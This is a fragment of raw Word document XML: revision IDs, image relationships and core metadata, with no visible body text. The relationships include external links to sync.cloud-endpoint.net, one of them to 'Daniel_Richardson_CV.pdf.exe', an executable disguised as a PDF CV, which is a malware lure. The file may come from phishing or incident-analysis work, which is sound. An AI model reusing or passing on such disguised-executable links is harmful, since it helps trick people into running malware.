    <w:rsid w:val="6D8E45EC"/>
    <w:rsid w:val="6E691407"/>
    <w:rsid w:val="6E6B53F5"/>
    <w:rsid w:val="6EA812B3"/>
    <w:rsid w:val="6EB1F9F2"/>
    <w:rsid w:val="6EFF37E2"/>
    <w:rsid w:val="6FE0E061"/>
    <w:rsid w:val="706D6B60"/>
    <w:rsid w:val="70A174D7"/>
    <w:rsid w:val="70F69087"/>
    <w:rsid w:val="7153A8DF"/>
    <w:rsid w:val="73839294"/>
    <w:rsid w:val="741386A1"/>
    <w:rsid w:val="748624F2"/>
    <w:rsid w:val="749E9F54"/>
    <w:rsid w:val="7571044D"/>
    <w:rsid w:val="76E7688E"/>
    <w:rsid w:val="77072522"/>
    <w:rsid w:val="78294640"/>
    <w:rsid w:val="783DE150"/>
    <w:rsid w:val="78E60BCC"/>
    <w:rsid w:val="792217F3"/>
    <w:rsid w:val="7934F77F"/>
    <w:rsid w:val="797A524D"/>
    <w:rsid w:val="7A1174B6"/>
    <w:rsid w:val="7AF2FE90"/>
    <w:rsid w:val="7AF7F2E5"/>
    <w:rsid w:val="7D6706CE"/>
    <w:rsid w:val="7D7BB303"/>
    <w:rsid w:val="7EE31D5D"/>
    <w:rsid w:val="7F56D853"/>
    <w:rsid w:val="7F677042"/>
    <w:rsid w:val="7FF15E3B"/>
    <w:rsid w:val="7FF2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B72A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{34CD3C3B-B11E-4A9B-96E8-6497ED3A16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FB31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1853225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId1779898998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId2014268533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId121891934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId2070706781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId1688428518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId1732154727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="rId1965700451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="rId315697923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="rId506229355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="rId1915244170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="rId1647472666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="rId1559614554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="rId2130037354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="rId2145672479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="rId970481309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="rId1998385312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="rId1591698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="rId52177391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="rId1009224110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="rId1107747470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="rId1208118027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sync.cloud-endpoint.net/" TargetMode="External" Id="R05c9bc2f17804c79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="rId1373903896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="rId835395305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sync.cloud-endpoint.net" TargetMode="External" Id="Rfea5c113462048af" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sync.cloud-endpoint.net/Daniel_Richardson_CV.pdf.exe" TargetMode="External" Id="R4ae91f2a11874617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="rId8479534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1a.png" Id="rId1177275611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sync.cloud-endpoint.net/" TargetMode="External" Id="Rdeef38e0b6654699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1b.png" Id="rId509177325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1c.png" Id="rId1253503680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1d.png" Id="rId1696143548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1e.png" Id="rId125537820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1f.png" Id="rId902039364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image20.png" Id="rId1524156354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image21.png" Id="rId473934450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image22.png" Id="rId679712181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image23.png" Id="rId754001466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image24.png" Id="rId7262644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2026-02-24T01:37:24.5995874Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-26T02:48:46.0061500Z</dcterms:modified>
  <dc:creator>Andrew Crouch</dc:creator>
  <lastModifiedBy>Andrew Crouch</lastModifiedBy>
</coreProperties>
</file>